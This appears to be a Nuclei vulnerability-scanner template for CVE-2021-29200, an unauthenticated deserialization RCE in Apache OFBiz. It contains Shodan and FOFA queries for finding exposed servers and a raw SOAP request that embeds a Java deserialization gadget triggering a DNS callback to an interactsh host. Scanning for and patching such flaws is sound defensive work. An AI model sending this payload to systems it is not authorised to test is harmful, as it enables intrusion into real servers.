Description
Apache OFBiz has unsafe deserialization prior to 17.12.07 version An unauthenticated user can perform an RCE attack
Apache OFBiz has unsafe deserialization prior to 17.12.07 version An unauthenticated user can perform an RCE attack
id: CVE-2021-29200
info:
name: Apache OFBiz < 17.12.07 - Arbitrary Code Execution
author: your3cho
severity: critical
description: |
Apache OFBiz has unsafe deserialization prior to 17.12.07 version An unauthenticated user can perform an RCE attack
impact: |
Unauthenticated attackers can exploit unsafe deserialization to execute arbitrary code, leading to complete server compromise.
remediation: |
Upgrade to Apache OFBiz version 17.12.07 or later.
reference:
- http://www.openwall.com/lists/oss-security/2021/04/27/4
- https://nvd.nist.gov/vuln/detail/CVE-2021-29200
- https://github.com/freeide/CVE-2021-29200
- https://lists.apache.org/thread.html/r108a964764b8bd21ebd32ccd4f51c183ee80a251c105b849154a8e9d%40%3Ccommits.ofbiz.apache.org%3E
- https://lists.apache.org/thread.html/r708351f1a8af7adb887cc3d8a92bed8fcbff4a9e495e69a9ee546fda%40%3Cnotifications.ofbiz.apache.org%3E
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-29200
cwe-id: CWE-502
epss-score: 0.5537
epss-percentile: 0.98981
cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: apache
product: ofbiz
shodan-query:
- html:"OFBiz"
- http.html:"ofbiz"
- ofbiz.visitor=
fofa-query:
- app="Apache_OFBiz"
- body="ofbiz"
- app="apache_ofbiz"
tags: cve2021,cve,apache,ofbiz,deserialization,rce,vuln
http:
- raw:
- |
POST /webtools/control/SOAPService HTTP/1.1
Host: {{Hostname}}
Content-Type: application/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header/>
<soapenv:Body>
<ser>
<map-HashMap>
<map-Entry>
<map-Key>
<cus-obj>{{generate_java_gadget("dns", "http://{{interactsh-url}}", "hex")}}</cus-obj>
</map-Key>
<map-Value>
<std-String value="STDSTRING"/>
</map-Value>
</map-Entry>
</map-HashMap>
</ser>
</soapenv:Body>
</soapenv:Envelope>
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
- type: word
part: body
words:
- 'value="responseMessage"'
# digest: 4b0a00483046022100dca1e4adfad3e5687d225ce0f2bdf88e1435e997899e971df5761537f95b4953022100d79f4557141fd85a23fa4f1421c2d38c1aab298c8230d8c6391efea697d6b1f4:922c64590222798bb761d5b6d8e72950
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.